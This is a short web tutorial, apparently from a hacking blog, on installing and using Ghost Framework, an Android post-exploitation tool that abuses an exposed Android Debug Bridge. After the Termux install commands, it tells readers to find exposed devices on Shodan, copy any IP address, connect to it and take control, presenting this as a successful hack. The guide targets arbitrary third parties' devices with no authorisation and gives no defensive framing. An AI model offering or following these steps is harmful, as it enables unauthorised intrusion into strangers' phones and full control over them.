Ghost Framework -- Control Android Devices Remotely |
![]() |
Hack using ghost frameworkWhat Is Ghost Framework ?Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge (ADB) to remotely access an Android device. We can use this framework to control old Android devices which have turn on the debug bridge in the "Developer options". Now this becomes very harmful because an attacker gets the full admin control on the vulnerable Android device. How To Install Ghost Framework ?1. Open Termux And Follow These Commands pkg update && pkg upgrade pkg install python3 pkg install python3-pip pip3 install git+https://github.com/EntySec/Ghost How To Use Ghost Framework ? 1. Open Ghost Framework By This Command ghost 2. Open Shodan 3. Search Android Debug Bridge 4. Copy Any Ip Address And Open Ghost Framework. 5. Follow These Commands To Connect To Ip Address. connect (ip address) 6. Now Type Help To Show Options Of Ghost Framework. Boom 💥 You Successfully Hacked Android Device.
|